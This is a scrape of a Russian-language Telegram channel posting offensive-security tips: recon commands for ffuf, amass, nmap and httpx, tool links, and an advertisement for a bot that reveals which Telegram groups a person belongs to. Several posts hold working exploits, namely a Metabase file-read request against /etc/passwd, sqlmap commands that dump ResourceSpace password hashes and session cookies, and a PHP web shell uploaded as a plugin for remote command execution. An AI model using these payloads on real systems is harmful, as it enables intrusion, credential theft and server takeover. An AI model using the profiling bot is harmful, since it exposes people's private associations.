SHADOW:Group
11.6K subscribers
106 photos
47 videos
19 files
821 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
Вы заметили резкий рост количества атак Ransomware группировок в этом году? ИБ специалисты говорят, что такой тренд сохраниться еще надолго. Кроме пробива инфраструктуры и локинга, элитные вымогательские группировки используют социальную инженерию (СИ), в качестве самого эффективного метода давления.

Прокаченные навыки СИ позволяет оказывать на компании сильнейшее давление, использовать СМИ в своих целях, и всегда оборачивать переговоры по выкупу в свою пользу. Каждый ИБ-специалист, вне зависимости от цвета шляпы, должен разбираться в человеческой психологии, понимать основы манипуляции, и уметь выстраивать правильную стратегию переговоров c контрагентами.

Рекомендую заглянуть на известный Telegram канал @Social_engineering. Автор собирает всё самое вкусное и полезное по социальной инженерии. А в комплекте с его материалами по OSINT, вам открываются еще большие перспективы.
​​🔎 Поиск скрытых сервисов через виртуальные хосты

Виртуальный хостинг — вид хостинга, при котором множество веб-сайтов расположено на одном веб-сервере.

Во время фазы разведки, поиск виртуальных хостов может помочь расширить цель, обнаружив старый или устаревший код, а также выявить скрытые сервисы и/или админ панели.

Используйте Burp Intruder или ffuf для каждого найденного вами домена и выполните фаззинг виртуальных хостов с помощью команд:

ffuf -c -u https://target.com -H "Host: FUZZ" -w vhost_wordlist.txt

или

ffuf -c -u https://target.com -H "Host: FUZZ.target.com" -w vhost_wordlist.txt

#web #vhost #recon
​​🔖 Быстрое сканирование сайта с помощью Google дорков

Данный OSINT проект позволяет найти на веб-сайте уязвимые страницы и файлы с конфиденциальной информацией, используя 45 типов Google Dorks.

Инструмент может находить популярные админ-панели, распространённые типы файлов и Path Traversal.

Ссылка на GitHub

#web #dork #recon #google
Бот TgScanRobot должен быть в арсенале любого OSINT-исследователя, HR-специалиста, хакера и просто любопытного человека. Бот позволяет узнать, в каких телеграм-группах, состоит интересующий вас человек.

На данный момент в базе данных бота содержится более миллиона групп и более полутора миллиардов связей пользователей c группами.

База бота постоянно пополняется. Бот ищет упоминания групп в различных интернет-источниках, затем заходит в новые группы и сохраняет список участников группы. Бот ежедневно обновляет списки участников уже известных ему групп.

@TgScanRobot

#Реклама
От страницы phpinfo до критических уязвимостей и RCE

Я думаю многим попадалась страница phpinfo, но вы не всегда знали, что можно получить с помощью её секретов. Данная статья раскроет один из возможных способов эксплуатации.

#web #rce #php #symfony

Читать статью
🔥1🤔1
​​📌 Инструмент для сбора поддоменов и поиска уязвимостей

Ещё один неплохой инструмент для поиска уязвимостей, под названием Garud.

Он позволяет собирать поддомены, проверять возможность их захвата, а также собирать URL адреса и находить распространённые уязвимости, такие как XSS, SSTI, SSRF, SQLi и другие.

Схема работы инструмента представлена на скрине ниже.

Ссылка на GitHub

#web #soft
​​📁 Быстрый поиск конфиденциальных данных в SMB

Для выполнения этой цели, можно использовать SMBSR. Это скрипт принимает адрес или список хостов, находит все открытые службы SMB (445) и пытается аутентифицироваться.

Если аутентификация прошла успешно, то все папки посещаются рекурсивно, в поисках секретов.

Для сканирования портов SMB используется модуль masscan. Интересные ключевые слова, которые должен искать инструмент, определяются в командной строке.

Ссылка на GitHub

#redteam #smb #leak
Forwarded from Social Engineering
📚 Этичный хакинг и информационная безопасность. Подборка бесплатных курсов.

🖖🏻 Приветствую тебя user_name.

💬 Я собрал для тебя подборку бесплатных курсов на любой вкус. Описание сможешь найти под названием каждого курса, перейдя по нужной ссылке.

• Бесплатный курс по взлому от HackerOne;
https://www.youtube.com/

• Базовый курс по Web Security, от Стэнфордского университета (актуальный на 2021 год);
https://web.stanford.edu/class/cs253/

• Зеркало интернета. Курс для Социальных инженеров и специалистов в области #OSINT:
https://xn--r1a.website/Social_engineering/1224

• Введение в реверсинг с нуля используя IDA PRO;
https://yutewiyof.gitbook.io/intro-rev-ida-pro/chast-01

• Android App Reverse Engineering 101;
https://maddiestone.github.io/AndroidAppRE/index.html

• Introduction to Computer Networks for Non Techies:
https://www.youtube.com/watch?v=aFzxweQ_iMk

• Cyber Security Hands-on: Complete Network Security A-Z
https://www.youtube.com/watch?v=HLrJlsxomks

• Хакинг с #Metasploit. RU.
https://xn--r1a.website/S_E_Reborn/811

• Бесплатные курсы. Сетевые технологии.
https://www.asozykin.ru/courses/networks_online
https://www.youtube.com/
https://xn--r1a.website/S_E_Reborn/1234

• Курс: Cobalt Strike. Переведено на RU.
https://xn--r1a.website/S_E_Reborn/10

• Red Hat Linux Certified System Admin SA1 RHEL7
https://www.youtube.com/watch?v=0yK5H6boJRE

• Полный курс по этичному хакингу с Nmap;
https://xn--r1a.website/Social_engineering/846

• Полный курс по WireShark;
https://xn--r1a.website/S_E_Reborn/229

• Database hacking и network protocols;
https://xn--r1a.website/Social_engineering/1066

• Start Kali Linux, Ethical Hacking and Penetration Testing!
https://www.youtube.com/watch?v=_As-rx86f-4

‼️ Дополнительную информацию ты можешь найти по хештегам #Курс и #Книга. Твой S.E.
👍3
​​📒 Анализируем доступный access.log

Если вы нашли доступный журнал access.log, то можно проанализировать его содержимое и просмотреть адреса с кодом ответа 200, так как это может привести к интересным находкам и утечкам.

Для этого можно использовать ffuf и выполнить:

cat access.log | grep " 200 " | cut -d'"' -f2 | cut -d' ' -f2 | sort -u | ffuf -mc 200 -w - -u "https://example.comFUZZ

Ну а если не хочется просматривать все вручную, то можно запустить Burp Suite с любым расширением для пассивного поиска секретов (например, SecretFinder или Burp Bounty) и пустить полученные результаты через Burp, указав параметр -replay-proxy:

cat access.log | grep " 200 " | cut -d'"' -f2 | cut -d' ' -f2 | sort -u | ffuf -mc 200 -w - -u "https://example.comFUZZ" -replay-proxy http://127.0.0.1:8080

#web #leak
​​​​🔦 Быстрый и настраиваемый сканер уязвимостей для JIRA

JIRA - это коммерческая система отслеживания проблем, разработанная Atlassian, которая позволяет отслеживать ошибки и гибко управлять проектами. На днях на гитхабе появился новый сканер уязвимостей написанный на Python для JIRA, под названием Jira-Lens.

Этот инструмент выполняет более 25 проверок, включая CVE и угрозы раскрытия информации в предоставленном экземпляре JIRA.

Чтобы немного автоматизировать, можно с помощью Nuclei определить какие хосты относятся к JIRA и просканировать их все:

cat alive.domains | nuclei -c 50 -silent -t ~/nuclei-templates/exposed-panels/jira-detect.yaml | awk '{print $6}' | anew jira.domains && python3 Jira-Lens.py -f jira.domains

#web #jira #tools

Ссылка на GitHub
​​ Сбор поддоменов с помощью перестановок и комбинаций

Чтобы найти еще больше поддоменов для атаки, мы можем сгенеририровать комбинации или перестановки уже известных нам поддоменов.

В этом методе нам также нужен небольшой список слов, который содержал бы такие распространенные слова, как mail, internal, dev, demo, accounts, ftp, admin (похоже на брутфорс поддоменов, но требуется меньше слов). Список таких слов можно найти например здесь.

Например, давайте рассмотрим поддомен dev.example.com. Мы можем сгенерировать различные вариации перестановок этого поддомена (смотри скрин ниже) с помощью инструмента gotator:

gotator -sub domains.txt -perm permutations_list.txt -depth 3 -numbers 10 | uniq > permutations.txt

Теперь, когда мы составили огромный список всех возможных поддоменов, пришло время зарезолвить их и узнать, существуют ли они на самом деле. Для этого мы будем использовать puredns:

puredns resolve permutations.txt -r resolvers.txt

Где взять актуальный список резолверов я расказывал вот тут.

#web #recon
👍2
​​📖 Произвольное чтение файлов в Metabase (CVE-2021-41277)

Metabase - это платформа для анализа данных с открытым исходным кодом. В уязвимых версиях была обнаружена проблема безопасности с настраиваемой картой GeoJSON приводящая к LFI. Более подробно тут.

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

Шаблон для Nuclei есть по ссылке. Уязвимые хосты можно поискать тут:

Дорк для Shodan
Дорк для Fofa

#web #cve
​​🏮 0day LPE в установщике Windows

Работает для всех версий установщика Windows, включая Windows 11 и Server 2022 с ноябрьским патчем.

Уязвимость была обнаружена при анализе патча для CVE-2021-41379. Мелкомягкие не смогли корректно исправить уязвимость, что в итоге привело к появлению обхода их патча.

Ссылка на эксплоит

#redteam #windows #lpe
​​🖇 Сканирование уязвимостей в Nmap с помощью NSE скриптов

Скрипты NSE Nmap позволяют не только выполнять задачи сканирования портов, но и обнаруживать CVE за считанные секунды.

Три наиболее популярных скрипта для обнаружения уязвимостей/CVE, найденных в Nmap NSE - это nmap-vulners, vulscan и vuln, которые позволят вам обнаруживать соответствующую информацию CVE на удаленных или локальных хостах.

Установка vulscan

git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan


Запуск vulscan

nmap -sV --script=vulscan/vulscan.nse www.example.com

Установка nmap-vulners

cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git

Запуск nmap-vulners

nmap --script nmap-vulners/ -sV 11.22.33.44

Запуск Vuln:

nmap -Pn --script vuln 192.168.1.105

Аналогичным образом используются и другие скрипты. Про все доступные в Nmap скрипты, а также про их удобный поиск я уже рассказывал ранее.

#redteam #recon #cve
👍1
​​💉 Множественные уязвимости в ResourceSpace (CVE-2021-41765)

Уязвимость в ResourceSpace <=9.5 позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольные SQL-команды, что может приводить к другим уязвимостям.

Это позволяет злоумышленникам раскрыть полное содержимое базы данных, включая файлы cookie сеанса пользователей и выполнять произвольные команды на сервере.

SQLi

sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysql

От SQLi до прав админа

Дампим имена, хэши паролей и куки, для получения административного доступа:

sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysql --dump -D resourcespace -T user -C username,password,session

RCE

В приложении есть функция загрузки плагинов, поэтому можно загрузить плагин, содержащий веб-оболочку:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>%

Упакуйте в .tar.gz, затем переименуйте в .rsp

Для получения более подробной информации смотрите тут.

#web #sqli #rce
🔥1
​​🕸 Веб-службы на нестандартных портах

Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.

Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:

httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result

#web #recon
💻 Управляем своим VPS через Telegram

Увидел на GitHub небольшой python скрипт, который позволяет выполнять команды на вашем сервере и получать выходные данные непосредственно в Telegram.

Это также может быть очень полезно при выполнении рекона или при выполнении длительных команд, которые требуют взаимодействия с пользователем.

Ссылка на GitHub

#bash #python #tools
​​🕵️‍♂️ Отслеживание новых целей для атаки

Каждое сканирование, которое вы выполняете с помощью amass, автоматически сохраняется на компьютере, на котором вы его запустили. Затем, если вы снова запустите ту же проверку, amass будет отслеживать любые изменения, произошедшие с момента вашего последнего сканирования.

Наиболее очевидный способ использовать эту функцию-определить, какие поддомены появились с момента вашего последнего сканирования. Например, вы выполняли ранее сканирование:

amass enum -d vimeo.com

Сейчас прошло несколько месяцев и если снова выполнить это сканирование, а затем прописать

amass track -d vimeo.com

то мы сможем увидеть все, что изменилось за эти месяцы. Это позволяет нам сосредоточить внимание на свежих целях, которые с большей вероятностью будут уязвимы.

#web #tools #recon